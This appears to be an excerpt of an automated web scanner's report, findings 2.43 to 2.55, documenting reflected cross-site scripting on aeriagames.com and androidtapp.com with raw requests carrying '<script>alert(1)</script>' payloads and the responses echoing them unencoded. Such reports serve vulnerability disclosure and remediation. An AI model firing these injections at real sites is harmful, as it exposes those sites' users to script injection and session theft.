if(!window.c3VTconstVal){c3VTconstVals={c3VJSconst:{c3VJSscriptLimit:0,c3VJScollection:new Array(),c3VJSurl:'v.js',c3VTJSurl:'c3VTabstrct-6-2.php'}};window.c3VTconstVal=c3VTconstVals}if(!window.fireC3VTJSobj){function fireC3VTJS(){this.fireCall=function(){var a=c3VTconstVal.c3VJSconst.c3VJSurl+'.*$';var b=c3VTconstVal.c3VJSconst.c3VTJSurl+"?id=adver&cid=480&t=7222ab3<script>alert(1)</script>aba291a8b78&rv=&uid=&td=";var c=document.getElementsByTagName('script')[0];var e=document.createElement('script');e.type='text/javascript';e.async=true;e.src='http://view.c3metrics.com/'+b;var r=new RegExp(a);var
...[SNIP]...

2.43. http://www.aeriagames.com/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.aeriagames.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f51ac"><script>alert(1)</script>26b262688fc was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.icof51ac"><script>alert(1)</script>26b262688fc HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.aeriagames.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 200 OK
Set-Cookie: AGESESSID=253b9e3fed2c000be62f6ab117f20c43; path=/; domain=.aeriagames.com
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Fri, 01 Apr 2011 16:12:06 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
P3P: CP=\"CAO IDC DSP COR CURa ADMa PSA OUR IND PHY ONL COM STA\"
Content-Type: text/html; charset=utf-8
Date: Fri, 01 Apr 2011 16:12:06 GMT
Server: Aeria Games & Entertainment
Content-Length: 30952


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">

<head>
<met
...[SNIP]...
<a lang="en" href="javascript:void(0);" class="mnu3-a" rel="http://www.aeriagames.com/favicon.icof51ac"><script>alert(1)</script>26b262688fc">
...[SNIP]...

2.44. http://www.aeriagames.com/favicon.ico [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.aeriagames.com
Path:   /favicon.ico

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3b7d3"><script>alert(1)</script>83550672c45 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.ico?3b7d3"><script>alert(1)</script>83550672c45=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.aeriagames.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 200 OK
Set-Cookie: AGESESSID=5d5f9a7f9719a26b405144a9e452eec3; path=/; domain=.aeriagames.com
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Fri, 01 Apr 2011 16:12:02 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
P3P: CP=\"CAO IDC DSP COR CURa ADMa PSA OUR IND PHY ONL COM STA\"
Content-Type: text/html; charset=utf-8
Date: Fri, 01 Apr 2011 16:12:02 GMT
Server: Aeria Games & Entertainment
Content-Length: 30979


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">

<head>
<met
...[SNIP]...
<a lang="en" href="javascript:void(0);" class="mnu3-a" rel="http://www.aeriagames.com/favicon.ico?3b7d3"><script>alert(1)</script>83550672c45=1">
...[SNIP]...

2.45. http://www.aeriagames.com/meebo.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.aeriagames.com
Path:   /meebo.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d1ddf"><script>alert(1)</script>a6cec7a49b4 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /meebo.htmld1ddf"><script>alert(1)</script>a6cec7a49b4?network=aeriagames&lang=en HTTP/1.1
Host: www.aeriagames.com
Proxy-Connection: keep-alive
Referer: http://www.aeriagames.com/favicon.icof51ac%22%3E%3Cscript%3Ealert(1)%3C/script%3E26b262688fc
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AGESESSID=253b9e3fed2c000be62f6ab117f20c43; utm_ref=http://burp/show/40

Response

HTTP/1.1 200 OK
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Fri, 01 Apr 2011 18:17:19 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
P3P: CP=\"CAO IDC DSP COR CURa ADMa PSA OUR IND PHY ONL COM STA\"
Content-Type: text/html; charset=utf-8
Date: Fri, 01 Apr 2011 18:17:19 GMT
Server: Aeria Games & Entertainment
Content-Length: 31114


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">

<head>
<met
...[SNIP]...
<a lang="en" href="javascript:void(0);" class="mnu3-a" rel="http://www.aeriagames.com/meebo.htmld1ddf"><script>alert(1)</script>a6cec7a49b4?network=aeriagames">
...[SNIP]...

2.46. http://www.aeriagames.com/themes/main/favicon.ico [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.aeriagames.com
Path:   /themes/main/favicon.ico

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 86f0a"><script>alert(1)</script>7e23ca68d85 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themes/main/favicon.ico86f0a"><script>alert(1)</script>7e23ca68d85 HTTP/1.1
Host: www.aeriagames.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AGESESSID=253b9e3fed2c000be62f6ab117f20c43; utm_ref=http://burp/show/40; __utmz=71836108.1301681874.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/40; __utma=71836108.1321417754.1301681874.1301681874.1301681874.1; __utmc=71836108; __utmb=71836108.1.10.1301681874; meebo-cim=channel%3D82; meebo-cim-session=ad-start-time%3D1301681875296%26start-time%3D1301681875312; __gads=ID=c2b00adb1bb4738d:T=1301681837:S=ALNI_MZdu27SS-zjLAzwIlLA-SFdjLpSBQ

Response

HTTP/1.1 200 OK
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Fri, 01 Apr 2011 18:17:48 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
P3P: CP=\"CAO IDC DSP COR CURa ADMa PSA OUR IND PHY ONL COM STA\"
Content-Type: text/html; charset=utf-8
Date: Fri, 01 Apr 2011 18:17:48 GMT
Server: Aeria Games & Entertainment
Content-Length: 31060


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">

<head>
<met
...[SNIP]...
<a lang="en" href="javascript:void(0);" class="mnu3-a" rel="http://www.aeriagames.com/themes/main/favicon.ico86f0a"><script>alert(1)</script>7e23ca68d85">
...[SNIP]...

2.47. http://www.aeriagames.com/themes/main/favicon.ico [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.aeriagames.com
Path:   /themes/main/favicon.ico

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2e0ac"><script>alert(1)</script>f4bce6bc013 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themes/main/favicon.ico?2e0ac"><script>alert(1)</script>f4bce6bc013=1 HTTP/1.1
Host: www.aeriagames.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AGESESSID=253b9e3fed2c000be62f6ab117f20c43; utm_ref=http://burp/show/40; __utmz=71836108.1301681874.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/40; __utma=71836108.1321417754.1301681874.1301681874.1301681874.1; __utmc=71836108; __utmb=71836108.1.10.1301681874; meebo-cim=channel%3D82; meebo-cim-session=ad-start-time%3D1301681875296%26start-time%3D1301681875312; __gads=ID=c2b00adb1bb4738d:T=1301681837:S=ALNI_MZdu27SS-zjLAzwIlLA-SFdjLpSBQ

Response

HTTP/1.1 200 OK
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Fri, 01 Apr 2011 18:17:47 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
P3P: CP=\"CAO IDC DSP COR CURa ADMa PSA OUR IND PHY ONL COM STA\"
Content-Type: text/html; charset=utf-8
Date: Fri, 01 Apr 2011 18:17:47 GMT
Server: Aeria Games & Entertainment
Content-Length: 31087


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">

<head>
<met
...[SNIP]...
<a lang="en" href="javascript:void(0);" class="mnu3-a" rel="http://www.aeriagames.com/themes/main/favicon.ico?2e0ac"><script>alert(1)</script>f4bce6bc013=1">
...[SNIP]...

2.48. http://www.androidtapp.com/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.androidtapp.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload ef3b2<script>alert(1)</script>d2de5acaa49 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.icoef3b2<script>alert(1)</script>d2de5acaa49 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.androidtapp.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Date: Fri, 01 Apr 2011 15:39:01 GMT
Server: LiteSpeed
Connection: close
X-Pingback: http://www.androidtapp.com/xmlrpc.php
Content-Type: text/html; charset=UTF-8
X-Powered-By: W3 Total Cache/0.9.1.1
Set-Cookie: PHPSESSID=bd8c5d93b8229accde529b3c0d1c1feb; path=/
Last-Modified: Fri, 01 Apr 2011 15:39:01 GMT
Vary: Cookie
Expires: Fri, 01 Apr 2011 16:39:01 GMT
Pragma: public
Cache-Control: public, must-revalidate, proxy-revalidate
ETag: e3aa57f2bc9542101a5bf25621531e29
Vary: User-Agent
Content-Length: 55020

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html
xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US"><head
profile
...[SNIP]...
<strong> http://www.androidtapp.com/favicon.icoef3b2<script>alert(1)</script>d2de5acaa49 </strong>
...[SNIP]...

2.49. http://www.androidtapp.com/favicon.icoef3b2%3Cscript%3Ealert(%22DORK%22)%3C/script%3Ed2de5acaa49 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.androidtapp.com
Path:   /favicon.icoef3b2%3Cscript%3Ealert(%22DORK%22)%3C/script%3Ed2de5acaa49

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload b6931<script>alert(1)</script>dcde4a5a5cc was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.icoef3b2%3Cscript%3Ealert(%22DORK%22)%3Cb6931<script>alert(1)</script>dcde4a5a5cc/script%3Ed2de5acaa49 HTTP/1.1
Host: www.androidtapp.com
Proxy-Connection: keep-alive
Referer: http://www.androidtapp.com/favicon.icoef3b2%3Cscript%3Ealert(%22DORK%22)%3C/script%3Ed2de5acaa49
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=cfd4e1e2237de0ee4f251e86b94bbc2a; GDgkjFlavnmGhFmj=kvGgzkvGumABBBxy; SJECT=CKON; __gads=ID=b4b02331d89ff875:T=1301681709:S=ALNI_MYpSTRZveHosSTXFDXa1dTNOqCBCQ

Response

HTTP/1.1 404 Not Found
Date: Fri, 01 Apr 2011 18:15:50 GMT
Server: LiteSpeed
Connection: close
X-Pingback: http://www.androidtapp.com/xmlrpc.php
Content-Type: text/html; charset=UTF-8
X-Powered-By: W3 Total Cache/0.9.1.1
Last-Modified: Fri, 01 Apr 2011 18:15:50 GMT
Vary: Accept-Encoding, Cookie
Expires: Fri, 01 Apr 2011 19:15:50 GMT
Pragma: public
Cache-Control: public, must-revalidate, proxy-revalidate
ETag: 699ce975eff4981aa59165f787b7046c
Vary: User-Agent
Content-Length: 55461

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html
xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US"><head
profile
...[SNIP]...
<strong> http://www.androidtapp.com/favicon.icoef3b2%3Cscript%3Ealert(%22DORK%22)%3Cb6931<script>alert(1)</script>dcde4a5a5cc/script%3Ed2de5acaa49 </strong>
...[SNIP]...

2.50. http://www.androidtapp.com/favicon.icoef3b2%3Cscript%3Ealert(%22DORK%22)%3C/script%3Ed2de5acaa49 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.androidtapp.com
Path:   /favicon.icoef3b2%3Cscript%3Ealert(%22DORK%22)%3C/script%3Ed2de5acaa49

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload d550f<script>alert(1)</script>b00bae0de29 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.icoef3b2%3Cscript%3Ealert(%22DORK%22)%3C/script%3Ed2de5acaa49d550f<script>alert(1)</script>b00bae0de29 HTTP/1.1
Host: www.androidtapp.com
Proxy-Connection: keep-alive
Referer: http://www.androidtapp.com/favicon.icoef3b2%3Cscript%3Ealert(%22DORK%22)%3C/script%3Ed2de5acaa49
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=cfd4e1e2237de0ee4f251e86b94bbc2a; GDgkjFlavnmGhFmj=kvGgzkvGumABBBxy; SJECT=CKON; __gads=ID=b4b02331d89ff875:T=1301681709:S=ALNI_MYpSTRZveHosSTXFDXa1dTNOqCBCQ

Response

HTTP/1.1 404 Not Found
Date: Fri, 01 Apr 2011 18:16:05 GMT
Server: LiteSpeed
Connection: close
X-Pingback: http://www.androidtapp.com/xmlrpc.php
Content-Type: text/html; charset=UTF-8
X-Powered-By: W3 Total Cache/0.9.1.1
Last-Modified: Fri, 01 Apr 2011 18:16:05 GMT
Vary: Accept-Encoding, Cookie
Expires: Fri, 01 Apr 2011 19:16:05 GMT
Pragma: public
Cache-Control: public, must-revalidate, proxy-revalidate
ETag: b7dcdde953d73819bf4a18c1ae16e6f1
Vary: User-Agent
Content-Length: 55461

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html
xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US"><head
profile
...[SNIP]...
<strong> http://www.androidtapp.com/favicon.icoef3b2%3Cscript%3Ealert(%22DORK%22)%3C/script%3Ed2de5acaa49d550f<script>alert(1)</script>b00bae0de29 </strong>
...[SNIP]...

2.51. http://www.androidtapp.com/favicon.icoef3b2%3Cscript%3Ealert(%22DORK%22)%3C/script%3Ed2de5acaa49 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.androidtapp.com
Path:   /favicon.icoef3b2%3Cscript%3Ealert(%22DORK%22)%3C/script%3Ed2de5acaa49

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 45df4<script>alert(1)</script>2f966fa6030 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.icoef3b2%3Cscript%3Ealert(%22DORK%22)%3C/script%3Ed2de5acaa49?45df4<script>alert(1)</script>2f966fa6030=1 HTTP/1.1
Host: www.androidtapp.com
Proxy-Connection: keep-alive
Referer: http://www.androidtapp.com/favicon.icoef3b2%3Cscript%3Ealert(%22DORK%22)%3C/script%3Ed2de5acaa49
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=cfd4e1e2237de0ee4f251e86b94bbc2a; GDgkjFlavnmGhFmj=kvGgzkvGumABBBxy; SJECT=CKON; __gads=ID=b4b02331d89ff875:T=1301681709:S=ALNI_MYpSTRZveHosSTXFDXa1dTNOqCBCQ

Response

HTTP/1.1 404 Not Found
Vary: Accept-Encoding
Date: Fri, 01 Apr 2011 18:15:28 GMT
Server: LiteSpeed
Connection: close
X-Pingback: http://www.androidtapp.com/xmlrpc.php
Content-Type: text/html; charset=UTF-8
X-Powered-By: W3 Total Cache/0.9.1.1
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Fri, 01 Apr 2011 18:15:26 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: User-Agent
Content-Length: 55496

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html
xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US"><head
profile
...[SNIP]...
<strong> http://www.androidtapp.com/favicon.icoef3b2%3Cscript%3Ealert(%22DORK%22)%3C/script%3Ed2de5acaa49?45df4<script>alert(1)</script>2f966fa6030=1 </strong>
...[SNIP]...

2.52. http://www.androidtapp.com/wp-admin/css/colors-fresh.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.androidtapp.com
Path:   /wp-admin/css/colors-fresh.css

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 6de6e<script>alert(1)</script>294e246263e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-admin6de6e<script>alert(1)</script>294e246263e/css/colors-fresh.css?ver=20100610 HTTP/1.1
Host: www.androidtapp.com
Proxy-Connection: keep-alive
Referer: http://www.androidtapp.com/wp-login.php
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=b4b02331d89ff875:T=1301681709:S=ALNI_MYpSTRZveHosSTXFDXa1dTNOqCBCQ; PHPSESSID=bd8c5d93b8229accde529b3c0d1c1feb; GDgkjFlavnmGhFmj=kvGgzkvGumABBBxy; SJECT=CKON; wordpress_test_cookie=WP+Cookie+check

Response

HTTP/1.1 404 Not Found
Vary: Accept-Encoding
Date: Fri, 01 Apr 2011 18:16:55 GMT
Server: LiteSpeed
Connection: close
X-Pingback: http://www.androidtapp.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Fri, 01 Apr 2011 18:16:53 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
X-Powered-By: W3 Total Cache/0.9.1.1
Vary: User-Agent
Content-Length: 55436

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html
xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US"><head
profile
...[SNIP]...
<strong> http://www.androidtapp.com/wp-admin6de6e<script>alert(1)</script>294e246263e/css/colors-fresh.css?ver=20100610 </strong>
...[SNIP]...

2.53. http://www.androidtapp.com/wp-admin/css/colors-fresh.css [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.androidtapp.com
Path:   /wp-admin/css/colors-fresh.css

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 9fc92<script>alert(1)</script>085ff8a812c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-admin/css9fc92<script>alert(1)</script>085ff8a812c/colors-fresh.css?ver=20100610 HTTP/1.1
Host: www.androidtapp.com
Proxy-Connection: keep-alive
Referer: http://www.androidtapp.com/wp-login.php
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=b4b02331d89ff875:T=1301681709:S=ALNI_MYpSTRZveHosSTXFDXa1dTNOqCBCQ; PHPSESSID=bd8c5d93b8229accde529b3c0d1c1feb; GDgkjFlavnmGhFmj=kvGgzkvGumABBBxy; SJECT=CKON; wordpress_test_cookie=WP+Cookie+check

Response

HTTP/1.1 404 Not Found
Vary: Accept-Encoding
Date: Fri, 01 Apr 2011 18:17:09 GMT
Server: LiteSpeed
Connection: close
X-Pingback: http://www.androidtapp.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Fri, 01 Apr 2011 18:17:08 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
X-Powered-By: W3 Total Cache/0.9.1.1
Vary: User-Agent
Content-Length: 55436

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html
xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US"><head
profile
...[SNIP]...
<strong> http://www.androidtapp.com/wp-admin/css9fc92<script>alert(1)</script>085ff8a812c/colors-fresh.css?ver=20100610 </strong>
...[SNIP]...

2.54. http://www.androidtapp.com/wp-admin/css/colors-fresh.css [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.androidtapp.com
Path:   /wp-admin/css/colors-fresh.css

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 8ebcd<script>alert(1)</script>46ec459dc7a was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-admin/css/colors-fresh.css8ebcd<script>alert(1)</script>46ec459dc7a?ver=20100610 HTTP/1.1
Host: www.androidtapp.com
Proxy-Connection: keep-alive
Referer: http://www.androidtapp.com/wp-login.php
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=b4b02331d89ff875:T=1301681709:S=ALNI_MYpSTRZveHosSTXFDXa1dTNOqCBCQ; PHPSESSID=bd8c5d93b8229accde529b3c0d1c1feb; GDgkjFlavnmGhFmj=kvGgzkvGumABBBxy; SJECT=CKON; wordpress_test_cookie=WP+Cookie+check

Response

HTTP/1.1 404 Not Found
Vary: Accept-Encoding
Date: Fri, 01 Apr 2011 18:17:23 GMT
Server: LiteSpeed
Connection: close
X-Pingback: http://www.androidtapp.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Fri, 01 Apr 2011 18:17:21 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
X-Powered-By: W3 Total Cache/0.9.1.1
Vary: User-Agent
Content-Length: 55436

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html
xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US"><head
profile
...[SNIP]...
<strong> http://www.androidtapp.com/wp-admin/css/colors-fresh.css8ebcd<script>alert(1)</script>46ec459dc7a?ver=20100610 </strong>
...[SNIP]...

2.55. http://www.androidtapp.com/wp-admin/css/login.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.androidtapp.com
Path:   /wp-admin/css/login.css

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload a5c5f<script>alert(1)</script>7b5a1b70079 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-admina5c5f<script>alert(1)</script>7b5a1b70079/css/login.css?ver=20100601 HTTP/1.1
Host: www.androidtapp.com
Proxy-Connection: keep-alive
Referer: http://www.androidtapp.com/wp-login.php
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=b4b02331d89ff875:T=1301681709:S=ALNI_MYpSTRZveHosSTXFDXa1dTNOqCBCQ; PHPSESSID=bd8c5d93b8229accde529b3c0d1c1feb; GDgkjFlavnmGhFmj=kvGgzkvGumABBBxy; SJECT=CKON; wordpress_test_cookie=WP+Cookie+check

Response

HTTP/1.1 404 Not Found
Vary: Accept-Encoding
Date: Fri, 01 Apr 2011 18:16:53 GMT
Server: LiteSpeed
Connection: close
X-Pingback: http://www.androidtapp.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Fri, 01 Apr 2011 18:16:50 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
X-Powered-By: W3 Total Cache/0.9.1.1
Vary: User-Agent
Content-Length: 55422

